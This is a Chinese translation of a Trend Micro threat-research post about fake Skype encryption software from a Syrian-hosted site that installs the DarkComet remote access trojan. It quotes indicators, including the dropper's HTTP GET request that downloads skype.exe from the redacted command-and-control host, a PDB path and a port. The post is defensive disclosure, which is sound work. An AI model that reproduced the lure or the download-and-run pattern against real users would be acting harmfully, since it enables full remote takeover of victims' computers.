CNN的報導也顯示,有惡意軟體正透過Skype來散播,這讓我們想起另一起之前所發現會利用Skype的攻擊。
趨勢科技發現有個網頁宣稱會提供Skype的加密軟體。這個網頁被代管在敘利亞的{BLOCKED}encription.sytes.net,IP地址是{BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。這是之前攻擊所用的同一台命令和控制(C&C)伺服器。該網頁有個內嵌YouTube影片,聲稱來自「IT Security Lab(安全實驗室)」,可以用來加密語音通訊。
如果使用者被騙去下載檔案,就會出現一個宣稱會加密使用者Skype數據的程式。這個程式 – Skype Encription v2.1.exe,被趨勢科技偵測為BKDR_METEO.HVN。分析之後,我們沒有發現任何證據顯示這軟體有提供任何安全功能。
這個檔案包含了一組字串,顯示它是由「SyRiAnHaCkErS」所建立的:
C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\Skype
Encription v 2.1.pdb
然後,這個軟體會送出一個連結:
GET /SkypeEncription/Download/skype.exe HTTP/1.1
Host: {BLOCKED}.{BLOCKED}.0.28
Connection: Keep-Alive
下載的skype.exe檔案被偵測為BKDR_ZAPCHAST.HVN,它其實是DarkComet版本3.3,會連到{BLOCKED}.{BLOCKED}.0.28端口771。在趨勢科技的測試環境裡重新導向流量,確認它確實是DarkComet。
一旦安裝了BKDR_ZAPCHAST.HVN,攻擊者可以透過DarkComet遠端存取木馬(RAT)來對受感染系統取得完全的控制。關於DarkComet遠端存取木馬的功能已經在這裡和這裡介紹過了。
請注意,Skype利用AES加密語音通訊和即時訊息,還包括視訊通話。
趨勢科技的使用者也不必擔心,他們可以透過主動式雲端截毒服務 Smart Protection Network偵測和刪除所有相關惡意軟體來防護這威脅。
@原文出處:Fake Skype Encryption Software Cloaks DarkComet Trojan作者:Natt Villeneuve(資深威脅研究員)